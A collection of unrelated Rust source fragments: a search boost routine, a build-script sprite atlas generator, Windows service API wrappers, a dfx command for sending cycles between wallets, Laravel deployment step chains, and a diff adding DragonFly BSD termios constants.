let kv_store = persistence.get_valueid_to_parent(&path.as_string())?; //TODO should be get_kv_store
for boost_pair in &mut hits.boost_ids {
let val_opt = kv_store.get_value(u64::from(boost_pair.id));
if let Some(anchor_id) = val_opt.as_ref() {
data.push(Hit::new(*anchor_id, boost_pair.score));
} else {
// can this happen: value_id without anchor id. I think not
}
}
hits.boost_ids = data;
Ok(())
}
/// Applies a field-level boost (looked up in `boost.path`'s boost store) to
/// each hit in `hits.hits_scores`, skipping hits whose current score matches
/// any entry in `skip_when_score` (within an epsilon of 1e-5).
pub(crate) fn add_boost(persistence: &Persistence, boost: &RequestBoostPart, hits: &mut SearchFieldResult) -> Result<(), VelociError> {
let boost_path = boost.path.to_string() + BOOST_VALID_TO_VALUE;
let boostkv_store = persistence.get_boost(&boost_path)?;
let boost_param = boost.param.map(|el| el.into_inner()).unwrap_or(0.0);
let expre = boost.expression.as_ref().map(|expression| ScoreExpression::new(expression.clone()));
let default = vec![];
let skip_when_score = boost
.skip_when_score
.as_ref()
.map(|vecco| vecco.iter().map(|el| el.into_inner()).collect())
.unwrap_or(default);
let mut explain = if hits.request.is_explain() { Some(&mut hits.explain) } else { None };
for hit in &mut hits.hits_scores {
if !skip_when_score.is_empty() && skip_when_score.iter().any(|x| (*x - hit.score).abs() < 0.00001) {
// float comparison with an explicit error margin
continue;
}
let val_opt = &boostkv_store.get_value(hit.id as u64);
if let Some(boost_value) = val_opt.as_ref() {
trace!("Found in boosting for value_id {:?}: {:?}", hit.id, val_opt);
// Boost values are stored as the raw bit pattern of an f32.
let boost_value = f32::from_bits(*boost_value);
trace!("Found in boosting for value_id {:?}: {:?}", hit.id, boost_value);
apply_boost(hit, boost_value, boost_param, &boost.boost_fun, &mut explain, &expre)?;
}
debug_assert!(!hit.score.is_nan());
debug_assert!(hit.score != std::f32::INFINITY);
}
Ok(())
}
|
use image::{GenericImage, RgbaImage};
use regex::Regex;
use std::collections::hash_map::Entry;
use std::collections::HashMap;
use std::fs::File;
use std::io::{BufWriter, Write};
use std::ops::Deref;
use std::path::Path;
use texture_packer::exporter::ImageExporter;
use texture_packer::importer::ImageImporter;
use texture_packer::{MultiTexturePacker, Rect, TexturePackerConfig};
/// Build-script entry point: packs every image under `sprite_folder` into
/// texture-atlas pages of `size` x `size`, writes the pages as
/// `<out_images>/<page>.png`, and generates `<out_code>/sprites.rs` containing
/// a `Sprites` struct with one field per sprite (or per sprite array).
///
/// Panics on any I/O failure or on an incomplete sprite array — this is
/// intended to run inside `build.rs`, where a panic fails the build.
pub fn gen_sprites(
    sprite_folder: impl AsRef<Path>,
    out_images: impl AsRef<Path>,
    out_code: impl AsRef<Path>,
    size: u32,
) {
    let mut packer = MultiTexturePacker::new_skyline(TexturePackerConfig {
        max_width: size,
        max_height: size,
        ..Default::default()
    });
    let mut entries = HashMap::new();
    let root = sprite_folder.as_ref();
    println!("cargo:rerun-if-changed={}", root.display());
    // Recursively pack every image and record each sprite under its field name.
    process_dir(&mut entries, &mut packer, root, None);
    let target = out_images.as_ref();
    std::fs::create_dir_all(target).unwrap();
    // One PNG per atlas page; the page index doubles as the texture layer.
    for (i, page) in packer.get_pages().iter().enumerate() {
        let img = ImageExporter::export(page).unwrap();
        img.save(target.join(&format!("{}.png", i))).unwrap();
    }
    // Validate that sprite arrays have no holes (e.g. foo.0 and foo.2 but no foo.1).
    for (name, k) in &entries {
        match k {
            Kind::Array(v) => {
                for (i, o) in v.iter().enumerate() {
                    if o.is_none() {
                        panic!("index {} of sprite array {} is missing", i, name);
                    }
                }
            }
            Kind::Just(_) => {}
        }
    }
    // Emit the generated module: struct declaration first...
    let mut sprites = BufWriter::new(File::create(out_code.as_ref().join("sprites.rs")).unwrap());
    write!(
        sprites,
        "mod sprites {{
        use game_util::sprite::Sprite;
        use game_util::prelude::*;
        pub struct Sprites {{"
    )
    .unwrap();
    for (name, kind) in &entries {
        match kind {
            Kind::Just(_) => write!(sprites, "pub {}: Sprite,", name).unwrap(),
            Kind::Array(v) => write!(sprites, "pub {}: [Sprite; {}],", name, v.len()).unwrap(),
        }
    }
    writeln!(sprites, "}}").unwrap();
    // ...then the async loader, which allocates a 2D texture array sized
    // {size} x {size} x {page count}.
    write!(
        sprites,
        r#"
    impl Sprites {{
        pub async fn load(gl: &Gl, base: &str) -> Result<(Self, glow::Texture), String> {{
            let tex;
            unsafe {{
                tex = gl.create_texture()?;
                gl.bind_texture(glow::TEXTURE_2D_ARRAY, Some(tex));
                gl.tex_image_3d(
                    glow::TEXTURE_2D_ARRAY,
                    0,
                    glow::RGBA8 as _,
                    {}, {0}, {},
                    0,
                    glow::RGBA,
                    glow::UNSIGNED_BYTE,
                    None
                );
                gl.tex_parameter_i32(
                    glow::TEXTURE_2D_ARRAY, glow::TEXTURE_MIN_FILTER, glow::LINEAR as _
                );
    "#,
        size,
        packer.get_pages().len()
    )
    .unwrap();
    // Load all page PNGs concurrently, each into its own texture layer.
    writeln!(sprites, "game_util::futures::try_join!(").unwrap();
    for i in 0..packer.get_pages().len() {
        writeln!(
            sprites,
            "async {{ game_util::glutil::load_texture_layer(
                gl, &(base.to_owned() + \"/{}.png\"), tex, {0}
            ).await }},",
            i
        )
        .unwrap();
    }
    writeln!(sprites, ")?;").unwrap();
    // Struct literal with one Sprite (or array of Sprites) per entry.
    write!(sprites, "}} Ok((Sprites {{").unwrap();
    for (name, kind) in &entries {
        write!(sprites, "{}: ", name).unwrap();
        match kind {
            Kind::Just(data) => write_sprite(&mut sprites, data, size),
            Kind::Array(v) => {
                write!(sprites, "[").unwrap();
                for data in v {
                    write_sprite(&mut sprites, data.as_ref().unwrap(), size);
                }
                write!(sprites, "],").unwrap();
            }
        }
        // Emits one `Sprite { ... },` literal; texture coords are normalized
        // by dividing pixel coordinates by the atlas size.
        fn write_sprite(sprites: &mut impl Write, data: &Data, size: u32) {
            write!(
                sprites,
                "Sprite {{\
                    tex: rect({}.0 / {}.0, {}.0 / {1}.0, {}.0 / {1}.0, {}.0 / {1}.0),\
                    trimmed_size: size2({}.0, {}.0),\
                    real_size: size2({}.0, {}.0),\
                    layer: {}.0,\
                    rotated: {}\
                }},",
                data.tex.x,
                size,
                data.tex.y,
                data.tex.w,
                data.tex.h,
                // If the packer rotated the sprite, swap width/height back.
                if data.rotated { data.tex.h } else { data.tex.w },
                if data.rotated { data.tex.w } else { data.tex.h },
                data.real_size.0,
                data.real_size.1,
                data.layer,
                data.rotated
            )
            .unwrap();
        }
    }
    write!(sprites, "}}, tex))}}}}}}").unwrap();
}
/// Recursively walks `path`, packing each image file and recording it in
/// `entries`. Subdirectory names become prefixes of the generated field name
/// (`field_name`), joined with `_`.
///
/// Files named `name.N.ext` become element `N` of a sprite array; plain
/// `name.ext` files become single sprites. Mixing both forms for the same
/// name, or registering the same name twice, panics (build failure).
fn process_dir(
    entries: &mut HashMap<String, Kind>,
    packer: &mut MultiTexturePacker<RgbaImage>,
    path: &Path,
    field_name: Option<String>,
) {
    for entry in std::fs::read_dir(path).unwrap() {
        let entry = entry.unwrap();
        // Make cargo re-run the build script when any sprite changes.
        println!("cargo:rerun-if-changed={}", entry.path().display());
        let t = entry.file_type().unwrap();
        let file_name = entry.file_name();
        let (name, array) = process_name(
            field_name.as_ref().map(Deref::deref),
            &file_name.to_string_lossy(),
        );
        if t.is_dir() {
            process_dir(entries, packer, &entry.path(), Some(name));
        } else if t.is_file() {
            // Packer key: "name[i]" for array elements, "name" otherwise.
            let key = match array {
                Some(i) => format!("{}[{}]", name, i),
                None => name.clone(),
            };
            // Non-image files are silently skipped (process_img returns None).
            let data = match process_img(packer, &key, &entry.path()) {
                Some(v) => v,
                None => continue,
            };
            if let Some(i) = array {
                let v = entries.entry(name.clone()).or_insert(Kind::Array(vec![]));
                match v {
                    Kind::Array(v) => {
                        // Grow the array with holes; holes are validated later.
                        while v.len() <= i {
                            v.push(None);
                        }
                        if v[i].is_some() {
                            panic!("??? two of the same index?");
                        }
                        v[i] = Some(data);
                    }
                    Kind::Just(_) => panic!("mixing sprite and array of sprites at {}", name),
                }
            } else {
                match entries.entry(name.clone()) {
                    Entry::Occupied(_) => {
                        panic!("there's already a sprite called {}", name);
                    }
                    Entry::Vacant(e) => {
                        e.insert(Kind::Just(data));
                    }
                }
            }
        }
        // Anything that is neither file nor directory (e.g. symlink) is ignored.
    }
}
/// An entry in the sprite table: either a single sprite or an indexed array
/// of sprites (built from `name.N.ext` files; `None` marks a missing index).
#[derive(Debug)]
enum Kind {
    Just(Data),
    Array(Vec<Option<Data>>),
}
/// Placement of one sprite inside the packed atlas.
#[derive(Debug)]
struct Data {
    tex: Rect,              // pixel rect inside the atlas page (border trimmed)
    real_size: (u32, u32),  // original image size in pixels, before padding
    layer: usize,           // atlas page index (texture array layer)
    rotated: bool,          // true if the packer rotated the sprite 90°
}
/// Splits a sprite file (or directory) name into a generated field name and
/// an optional array index: `"walk.3.png"` yields `("walk", Some(3))`,
/// `"idle.png"` yields `("idle", None)`. A parent directory name, when
/// present, is prepended with an underscore to namespace the field.
///
/// # Panics
/// Panics if the name does not match the expected `ident[.N].ext` pattern.
fn process_name(parent_name: Option<&str>, name: &str) -> (String, Option<usize>) {
    lazy_static::lazy_static! {
        // BUG FIX: the index separator was an unescaped `.`, which matches
        // ANY character — so e.g. "walk-3.png" was silently accepted as
        // element 3 of a "walk" array. `\.` matches only a literal dot.
        static ref REGEX: Regex = Regex::new(r"^([_a-zA-Z][_\w]*)(?:\.(\d+))?\.\w+$").unwrap();
    }
    match REGEX.captures(name) {
        Some(caps) => {
            let name = caps.get(1).unwrap().as_str();
            // Prefix with the parent directory's field name, if any.
            let name = match parent_name {
                Some(p) => format!("{}_{}", p, name),
                None => name.to_owned(),
            };
            // Group 2 is all-digits by construction, so parse cannot fail.
            let index = caps.get(2).map(|m| m.as_str().parse().unwrap());
            (name, index)
        }
        None => panic!("invalid name: {}", name),
    }
}
/// Imports the image at `path`, pads any side whose edge row/column contains
/// a non-transparent pixel with a duplicated 1px border (prevents texture
/// bleeding when the atlas is sampled with linear filtering), packs it under
/// `key`, and returns its atlas placement with the border trimmed back out.
///
/// Returns `None` if the file cannot be decoded as an image.
fn process_img(packer: &mut MultiTexturePacker<RgbaImage>, key: &str, path: &Path) -> Option<Data> {
    let mut img = ImageImporter::import_from_file(path).ok()?.to_rgba8();
    let width = img.width();
    let height = img.height();
    // A border is only needed on sides where opaque pixels touch the edge
    // (alpha channel is byte index 3 of the RGBA pixel).
    let mut add_top_border = false;
    let mut add_bottom_border = false;
    for x in 0..width {
        if img.get_pixel(x, 0).0[3] != 0 {
            add_top_border = true;
        }
        if img.get_pixel(x, height - 1).0[3] != 0 {
            add_bottom_border = true;
        }
    }
    let mut add_left_border = false;
    let mut add_right_border = false;
    for y in 0..height {
        if img.get_pixel(0, y).0[3] != 0 {
            add_left_border = true;
        }
        if img.get_pixel(width - 1, y).0[3] != 0 {
            add_right_border = true;
        }
    }
    if add_right_border || add_left_border || add_top_border || add_bottom_border {
        // Rebuild the image enlarged by one pixel per bordered side, with the
        // original copied at the appropriate offset.
        let new_w = add_left_border as u32 + add_right_border as u32 + width;
        let new_h = add_top_border as u32 + add_bottom_border as u32 + height;
        let offset_x = add_left_border as u32;
        let offset_y = add_top_border as u32;
        let base = img;
        img = RgbaImage::new(new_w, new_h);
        img.copy_from(&base, offset_x, offset_y).unwrap();
        // Duplicate the edge rows into the top/bottom border...
        for x in 0..width {
            if add_top_border {
                img.put_pixel(offset_x + x, 0, *base.get_pixel(x, 0));
            }
            if add_bottom_border {
                img.put_pixel(
                    offset_x + x,
                    img.height() - 1,
                    *base.get_pixel(x, height - 1),
                );
            }
        }
        // ...and the edge columns into the left/right border.
        for y in 0..height {
            if add_left_border {
                img.put_pixel(0, offset_y + y, *base.get_pixel(0, y));
            }
            if add_right_border {
                img.put_pixel(img.width() - 1, offset_y + y, *base.get_pixel(width - 1, y));
            }
        }
        // Fill corner pixels where two borders meet.
        if add_left_border && add_top_border {
            img.put_pixel(0, 0, *base.get_pixel(0, 0));
        }
        if add_left_border && add_bottom_border {
            img.put_pixel(0, img.height() - 1, *base.get_pixel(0, height - 1));
        }
        if add_right_border && add_top_border {
            img.put_pixel(img.width() - 1, 0, *base.get_pixel(width - 1, 0));
        }
        if add_right_border && add_bottom_border {
            img.put_pixel(
                img.width() - 1,
                img.height() - 1,
                *base.get_pixel(width - 1, height - 1),
            );
        }
    }
    packer.pack_own(key.to_string(), img).unwrap();
    // Find which page the packer placed the sprite on; that page index is the
    // texture array layer.
    let mut frame = None;
    for (i, page) in packer.get_pages().iter().enumerate() {
        if let Some(f) = page.get_frame(&key) {
            frame = Some((i, f));
        }
    }
    let (layer, frame) = frame.unwrap();
    let mut data = Data {
        tex: frame.frame,
        real_size: (width, height),
        layer,
        rotated: frame.rotated,
    };
    // Trim the duplicated 1px border back out of the reported rect so the
    // sprite's texture coordinates cover only the original pixels.
    if add_top_border {
        data.tex.h -= 1;
        data.tex.y += 1;
    }
    if add_bottom_border {
        data.tex.h -= 1;
    }
    if add_left_border {
        data.tex.w -= 1;
        data.tex.x += 1;
    }
    if add_right_border {
        data.tex.w -= 1;
    }
    Some(data)
}
|
use winapi::winsvc;
use winapi::winnt;
use winapi::{DWORD, LPWSTR};
use advapi32;
use util;
use std;
use std::error;
/// Control requests a Windows service declares it can accept — one variant
/// per `SERVICE_ACCEPT_*` bit flag used in `dwControlsAccepted`.
#[derive(Debug)]
pub enum ServiceAccept {
    STOP,
    SHUTDOWN,
    POWEREVENT,
    TIMECHANGE,
    PARAMCHANGE,
    PRESHUTDOWN,
    TRIGGEREVENT,
    NETBINDCHANGE,
    SESSIONCHANGE,
    PAUSE_CONTINUE,
    HARDWAREPROFILECHANGE,
}
impl ServiceAccept {
    /// Returns the winapi `SERVICE_ACCEPT_*` bit flag for this variant.
    pub fn value(&self) -> DWORD {
        match *self {
            ServiceAccept::STOP => winsvc::SERVICE_ACCEPT_STOP,
            ServiceAccept::SHUTDOWN => winsvc::SERVICE_ACCEPT_SHUTDOWN,
            ServiceAccept::POWEREVENT => winsvc::SERVICE_ACCEPT_POWEREVENT,
            ServiceAccept::TIMECHANGE => winsvc::SERVICE_ACCEPT_TIMECHANGE,
            ServiceAccept::PARAMCHANGE => winsvc::SERVICE_ACCEPT_PARAMCHANGE,
            ServiceAccept::PRESHUTDOWN => winsvc::SERVICE_ACCEPT_PRESHUTDOWN,
            ServiceAccept::TRIGGEREVENT => winsvc::SERVICE_ACCEPT_TRIGGEREVENT,
            ServiceAccept::NETBINDCHANGE => winsvc::SERVICE_ACCEPT_NETBINDCHANGE,
            ServiceAccept::SESSIONCHANGE => winsvc::SERVICE_ACCEPT_SESSIONCHANGE,
            ServiceAccept::PAUSE_CONTINUE => winsvc::SERVICE_ACCEPT_PAUSE_CONTINUE,
            ServiceAccept::HARDWAREPROFILECHANGE => winsvc::SERVICE_ACCEPT_HARDWAREPROFILECHANGE,
        }
    }
}
// Idiom fix: implement `From` instead of a hand-written `Into` (clippy
// `from_over_into`). The standard blanket impl still provides `Into<DWORD>`,
// so existing `.into()` call sites keep working unchanged.
impl From<ServiceAccept> for DWORD {
    fn from(accept: ServiceAccept) -> DWORD {
        accept.value()
    }
}
/// Windows service type — one variant per `SERVICE_*` type constant used in
/// `dwServiceType`.
#[derive(Debug)]
pub enum ServiceType {
    ADAPTER,
    DRIVER,
    FILE_SYSTEM_DRIVER,
    INTERACTIVE_PROCESS,
    KERNEL_DRIVER,
    RECOGNIZER_DRIVER,
    TYPE_ALL,
    WIN32,
    WIN32_OWN_PROCESS,
    WIN32_SHARE_PROCESS,
}
impl ServiceType {
    /// Returns the winapi `SERVICE_*` type constant for this variant.
    pub fn value(&self) -> DWORD {
        match *self {
            ServiceType::ADAPTER => winnt::SERVICE_ADAPTER,
            ServiceType::DRIVER => winnt::SERVICE_DRIVER,
            ServiceType::FILE_SYSTEM_DRIVER => winnt::SERVICE_FILE_SYSTEM_DRIVER,
            ServiceType::INTERACTIVE_PROCESS => winnt::SERVICE_INTERACTIVE_PROCESS,
            ServiceType::KERNEL_DRIVER => winnt::SERVICE_KERNEL_DRIVER,
            ServiceType::RECOGNIZER_DRIVER => winnt::SERVICE_RECOGNIZER_DRIVER,
            ServiceType::TYPE_ALL => winnt::SERVICE_TYPE_ALL,
            ServiceType::WIN32 => winnt::SERVICE_WIN32,
            ServiceType::WIN32_OWN_PROCESS => winnt::SERVICE_WIN32_OWN_PROCESS,
            ServiceType::WIN32_SHARE_PROCESS => winnt::SERVICE_WIN32_SHARE_PROCESS,
        }
    }
}
// Idiom fix: implement `From` instead of a hand-written `Into` (clippy
// `from_over_into`); `.into()` call sites keep working via the blanket impl.
impl From<ServiceType> for DWORD {
    fn from(service_type: ServiceType) -> DWORD {
        service_type.value()
    }
}
/// Control codes the Service Control Manager can deliver to a service's
/// control handler (subset of `SERVICE_CONTROL_*`).
#[derive(Debug)]
pub enum ServiceControl {
    STOP,
    PAUSE,
    CONTINUE,
    SHUTDOWN,
}
impl ServiceControl {
    /// Converts a raw `SERVICE_CONTROL_*` code received from the SCM into a
    /// variant; unsupported codes are reported as an error rather than
    /// panicking, since they arrive from outside the program.
    pub fn from_dw(value: DWORD) -> Result<Self, Box<error::Error>> {
        match value {
            winsvc::SERVICE_CONTROL_STOP => Ok(ServiceControl::STOP),
            winsvc::SERVICE_CONTROL_PAUSE => Ok(ServiceControl::PAUSE),
            winsvc::SERVICE_CONTROL_CONTINUE => Ok(ServiceControl::CONTINUE),
            winsvc::SERVICE_CONTROL_SHUTDOWN => Ok(ServiceControl::SHUTDOWN),
            unknown_value => Err(From::from(format!("No ServiceControl variant matching: {:?}", unknown_value))),
        }
    }
}
/// Current state of a service as reported to the SCM (`SERVICE_*` state
/// constants for `dwCurrentState`).
#[derive(Debug)]
pub enum ServiceState {
    CONTINUE_PENDING,
    PAUSE_PENDING,
    PAUSED,
    RUNNING,
    START_PENDING,
    STOP_PENDING,
    STOPPED,
}
impl ServiceState {
    /// Returns the winapi `SERVICE_*` state constant for this variant.
    pub fn value(&self) -> DWORD {
        match *self {
            ServiceState::CONTINUE_PENDING => winsvc::SERVICE_CONTINUE_PENDING,
            ServiceState::PAUSE_PENDING => winsvc::SERVICE_PAUSE_PENDING,
            ServiceState::PAUSED => winsvc::SERVICE_PAUSED,
            ServiceState::RUNNING => winsvc::SERVICE_RUNNING,
            ServiceState::START_PENDING => winsvc::SERVICE_START_PENDING,
            ServiceState::STOP_PENDING => winsvc::SERVICE_STOP_PENDING,
            ServiceState::STOPPED => winsvc::SERVICE_STOPPED,
        }
    }
}
/// Rust-side mirror of `winsvc::SERVICE_STATUS`, holding typed fields that
/// are flattened into the raw struct by [`ServiceStatus::get_inner`].
pub struct ServiceStatus {
    service_type: ServiceType,
    current_state: ServiceState,
    controls_accepted: Vec<ServiceAccept>,
    win32_exit_code: DWORD,
    service_specific_exit_code: DWORD,
    check_point: DWORD,
    wait_hint: DWORD,
}
impl ServiceStatus {
    /// Bundles everything needed to report a service's status to the SCM.
    pub fn new(
        service_type: ServiceType,
        current_state: ServiceState,
        controls_accepted: Vec<ServiceAccept>,
        win32_exit_code: DWORD,
        service_specific_exit_code: DWORD,
        check_point: DWORD,
        wait_hint: DWORD,
    ) -> Self {
        ServiceStatus {
            service_type,
            current_state,
            controls_accepted,
            win32_exit_code,
            service_specific_exit_code,
            check_point,
            wait_hint,
        }
    }
    /// Builds the raw `SERVICE_STATUS` struct expected by the Win32 API.
    pub fn get_inner(&self) -> winsvc::SERVICE_STATUS {
        // OR all accepted controls into one bit mask. (Simplified from a fold
        // that mutated and re-returned an accumulator binding.)
        let controls_accepted: DWORD = self.controls_accepted.iter().fold(0, |acc, val| acc | val.value());
        winsvc::SERVICE_STATUS {
            dwServiceType: self.service_type.value(),
            dwCurrentState: self.current_state.value(),
            dwControlsAccepted: controls_accepted,
            dwWin32ExitCode: self.win32_exit_code,
            dwServiceSpecificExitCode: self.service_specific_exit_code,
            dwCheckPoint: self.check_point,
            dwWaitHint: self.wait_hint,
        }
    }
}
/// Builder for the `SERVICE_TABLE_ENTRYW` array handed to
/// `StartServiceCtrlDispatcherW`.
pub struct ServiceTable {
    services: Vec<winsvc::SERVICE_TABLE_ENTRYW>,
    // Owned wide-string service names. The raw `lpServiceName` pointers in
    // `services` point into these heap buffers, so they must live as long as
    // the table itself.
    // NOTE(review): assumes util::win32_string returns Vec<u16> — confirm.
    service_names: Vec<Vec<u16>>,
}
impl ServiceTable {
    pub fn new() -> Self {
        ServiceTable {
            services: Vec::new(),
            service_names: Vec::new(),
        }
    }
    /// Registers a service entry; the name is converted to a wide string that
    /// the table keeps alive.
    pub fn register_new_service(
        &mut self,
        service_name: &str,
        service_main: unsafe extern "system" fn(dwNumServicesArgs: DWORD, lpServiceArgVectors: *mut LPWSTR)
    ) {
        // BUG FIX: the original took `.as_ptr()` of a temporary returned by
        // `util::win32_string(...)`, which is dropped at the end of the
        // statement — `lpServiceName` dangled by the time the dispatcher read
        // it. Own the buffer in `self.service_names` instead; pushing the Vec
        // moves only its header, so the heap pointer stays valid.
        let name = util::win32_string(service_name);
        let service = winsvc::SERVICE_TABLE_ENTRYW {
            lpServiceName: name.as_ptr(),
            lpServiceProc: Some(service_main),
        };
        self.service_names.push(name);
        self.services.push(service);
    }
    /// Appends the required NULL terminator entry and hands the table to the
    /// SCM. Blocks until all registered services have stopped.
    pub fn start(mut self) {
        self.services.push(winsvc::SERVICE_TABLE_ENTRYW { lpServiceName: std::ptr::null(), lpServiceProc: None});
        unsafe { advapi32::StartServiceCtrlDispatcherW(self.services.as_ptr()) };
    }
}
// #[cfg(test)]
// mod tests {
// use super::*;
// #[test]
// fn basic_test() {
// let a = ServiceAccept::STOP;
// let b = ServiceAccept::TRIGGEREVENT;
// let c = a | b;
// assert_eq!(c, 5);
// }
// }
|
use crate::commands::wallet::wallet_update;
use crate::lib::environment::Environment;
use crate::lib::error::DfxResult;
use crate::util::clap::validators::cycle_amount_validator;
use anyhow::anyhow;
use candid::CandidType;
use clap::Clap;
use ic_types::Principal;
/// Send cycles to another cycles wallet.
#[derive(Clap)]
pub struct SendOpts {
    /// Canister ID of the destination cycles wallet.
    destination: String,
    /// Specifies the amount of cycles to send.
    /// Deducted from the wallet.
    // Validated up front by clap, so the later `parse().unwrap()` is safe.
    #[clap(validator(cycle_amount_validator))]
    amount: String,
}
/// Sends `opts.amount` cycles from the configured wallet to the wallet
/// canister identified by `opts.destination` via the `wallet_send` update
/// call.
///
/// # Errors
/// Fails if the destination is not a valid principal, the update call itself
/// fails, or the remote wallet rejects the transfer.
pub async fn exec(env: &dyn Environment, opts: SendOpts) -> DfxResult {
    // Candid argument record expected by the wallet's `wallet_send` method.
    #[derive(CandidType)]
    struct In {
        canister: Principal,
        amount: u64,
    }
    let canister = Principal::from_text(opts.destination.clone())?;
    // amount has been validated by cycle_amount_validator
    let amount = opts.amount.parse::<u64>().unwrap();
    // The wallet returns Result<(), String>; map its error string into an
    // anyhow error with the destination for context.
    let (res,): (Result<(), String>,) =
        wallet_update(env, "wallet_send", In { canister, amount }).await?;
    Ok(res.map_err(|err| {
        anyhow!(
            "Sending cycles to {} failed with: {}",
            opts.destination,
            err
        )
    })?)
}
|
use facteur::Facteur;
// Checklist printed after `init` completes. (`'static` was redundant here:
// references in `const` items already have the static lifetime — clippy
// `redundant_static_lifetimes`.)
const INIT_END_TEXT: &str =
    r#"Init done.
Now you may have to:
  • edit your .env file and add your configuration data
  • run `php artisan key:generate` in `current` dir
  • setup nginx
  • run your migrations
  • chown your basedir with user you want to use"#;
/// First-time setup: creates the base and release directories, clones the
/// project, installs composer dependencies, seeds `.env` and the storage
/// dir, links `current`, then prints the post-init checklist.
/// Step order matters — each builder call depends on the previous one.
pub fn init(postman: Facteur) {
    postman
        .welcome("Initialisation")
        .mkdir_base()
        .canonicalize_basedir()
        .mkdir_release()
        .clone()
        .composer()
        .init_env()
        .init_storage()
        .symlink()
        .bye(INIT_END_TEXT);
}
/// Deploys a new release: clones into a fresh release dir, reuses the shared
/// `.env` and storage, runs migrations, atomically repoints the `current`
/// symlink, and prunes old releases. Step order matters.
pub fn deploy(postman: Facteur) {
    postman
        .welcome("Deployment")
        .canonicalize_basedir()
        .mkdir_release()
        .clone()
        .copy_env()
        .composer()
        .switch_storage()
        .migrate()
        .symlink()
        .clean_old_releases()
        .bye("Deployment Success");
}
/// Points the `current` symlink back at the previous release.
pub fn rollback(postman: Facteur) {
    postman
        .welcome("Rollback")
        .rollback()
        .bye("Rollback done");
}
--- /dev/null
+++ cargo-crates/termios-0.2.2/src/os/dragonfly.rs
@@ -0,0 +1,158 @@
+#![allow(non_camel_case_types)]
+
+extern crate libc;
+
+use libc::{c_int,c_uint,c_uchar};
+
+pub type cc_t = c_uchar;
+pub type speed_t = c_uint;
+pub type tcflag_t = c_uint;
+
+#[derive(Debug,Copy,Clone,Eq,PartialEq)]
+#[repr(C)]
+pub struct termios {
+ pub c_iflag: tcflag_t,
+ pub c_oflag: tcflag_t,
+ pub c_cflag: tcflag_t,
+ pub c_lflag: tcflag_t,
+ pub c_cc: [cc_t; NCCS],
+ c_ispeed: speed_t,
+ c_ospeed: speed_t
+}
+
+pub const NCCS: usize = 20;
+
+// c_cc characters
+pub const VEOF: usize = 0;
+pub const VEOL: usize = 1;
+pub const VEOL2: usize = 2;
+pub const VERASE: usize = 3;
+pub const VWERASE: usize = 4;
+pub const VKILL: usize = 5;
+pub const VREPRINT: usize = 6;
+pub const VERASE2: usize = 7;
+pub const VINTR: usize = 8;
+pub const VQUIT: usize = 9;
+pub const VSUSP: usize = 10;
+pub const VDSUSP: usize = 11;
+pub const VSTART: usize = 12;
+pub const VSTOP: usize = 13;
+pub const VLNEXT: usize = 14;
+pub const VDISCARD: usize = 15;
+pub const VMIN: usize = 16;
+pub const VTIME: usize = 17;
+pub const VSTATUS: usize = 18;
+pub const VCHECKPT: usize = 19;
+
+// c_iflag bits
+pub const IGNBRK: tcflag_t = 0x00000001;
+pub const BRKINT: tcflag_t = 0x00000002;
+pub const IGNPAR: tcflag_t = 0x00000004;
+pub const PARMRK: tcflag_t = 0x00000008;
+pub const INPCK: tcflag_t = 0x00000010;
+pub const ISTRIP: tcflag_t = 0x00000020;
+pub const INLCR: tcflag_t = 0x00000040;
+pub const IGNCR: tcflag_t = 0x00000080;
+pub const ICRNL: tcflag_t = 0x00000100;
+pub const IXON: tcflag_t = 0x00000200;
+pub const IXOFF: tcflag_t = 0x00000400;
+pub const IXANY: tcflag_t = 0x00000800;
+pub const IMAXBEL: tcflag_t = 0x00002000;
+
+// c_oflag bits
+pub const OPOST: tcflag_t = 0x00000001;
+pub const ONLCR: tcflag_t = 0x00000002;
+pub const OXTABS: tcflag_t = 0x00000004;
+pub const TABDLY: tcflag_t = 0x00000004;
+// pub const TAB0: tcflag_t = 0x00000000;
+pub const TAB3: tcflag_t = OXTABS;
+pub const ONOEOT: tcflag_t = 0x00000008;
+pub const OCRNL: tcflag_t = 0x00000010;
+pub const ONOCR: tcflag_t = 0x00000020;
+pub const ONLRET: tcflag_t = 0x00000040;
+
+// c_cflag bits
+pub const CIGNORE: tcflag_t = 0x00000001;
+pub const CSIZE: tcflag_t = 0x00000300;
+pub const CS5: tcflag_t = 0x00000000;
+pub const CS6: tcflag_t = 0x00000100;
+pub const CS7: tcflag_t = 0x00000200;
+pub const CS8: tcflag_t = 0x00000300;
+pub const CSTOPB: tcflag_t = 0x00000400;
+pub const CREAD: tcflag_t = 0x00000800;
+pub const PARENB: tcflag_t = 0x00001000;
+pub const PARODD: tcflag_t = 0x00002000;
+pub const HUPCL: tcflag_t = 0x00004000;
+pub const CLOCAL: tcflag_t = 0x00008000;
+pub const CCTS_OFLOW: tcflag_t = 0x00010000;
+pub const CRTSCTS: tcflag_t = CCTS_OFLOW | CRTS_IFLOW;
+pub const CRTS_IFLOW: tcflag_t = 0x00020000;
+pub const CDTR_IFLOW: tcflag_t = 0x00040000;
+pub const CDSR_OFLOW: tcflag_t = 0x00080000;
+pub const CCAR_OFLOW: tcflag_t = 0x00100000;
+pub const MDMBUF: tcflag_t = CCAR_OFLOW;
+
+// c_lflag bits
+pub const ECHOKE: tcflag_t = 0x00000001;
+pub const ECHOE: tcflag_t = 0x00000002;
+pub const ECHOK: tcflag_t = 0x00000004;
+pub const ECHO: tcflag_t = 0x00000008;
+pub const ECHONL: tcflag_t = 0x00000010;
+pub const ECHOPRT: tcflag_t = 0x00000020;
+pub const ECHOCTL: tcflag_t = 0x00000040;
+pub const ISIG: tcflag_t = 0x00000080;
+pub const ICANON: tcflag_t = 0x00000100;
+pub const ALTWERASE: tcflag_t = 0x00000200;
+pub const IEXTEN: tcflag_t = 0x00000400;
+pub const EXTPROC: tcflag_t = 0x00000800;
+pub const TOSTOP: tcflag_t = 0x00400000;
+pub const FLUSHO: tcflag_t = 0x00800000;
+pub const NOKERNINFO: tcflag_t = 0x02000000;
+pub const PENDIN: tcflag_t = 0x20000000;
+pub const NOFLSH: tcflag_t = 0x80000000;
+
+// baud rates
+pub const B0: speed_t = 0;
+pub const B50: speed_t = 50;
+pub const B75: speed_t = 75;
+pub const B110: speed_t = 110;
+pub const B134: speed_t = 134;
+pub const B150: speed_t = 150;
+pub const B200: speed_t = 200;
+pub const B300: speed_t = 300;
+pub const B600: speed_t = 600;
+pub const B1200: speed_t = 1200;
+pub const B1800: speed_t = 1800;
+pub const B2400: speed_t = 2400;
+pub const B4800: speed_t = 4800;
+pub const B9600: speed_t = 9600;
+pub const B19200: speed_t = 19200;
+pub const B38400: speed_t = 38400;
+pub const B7200: speed_t = 7200;
+pub const B14400: speed_t = 14400;
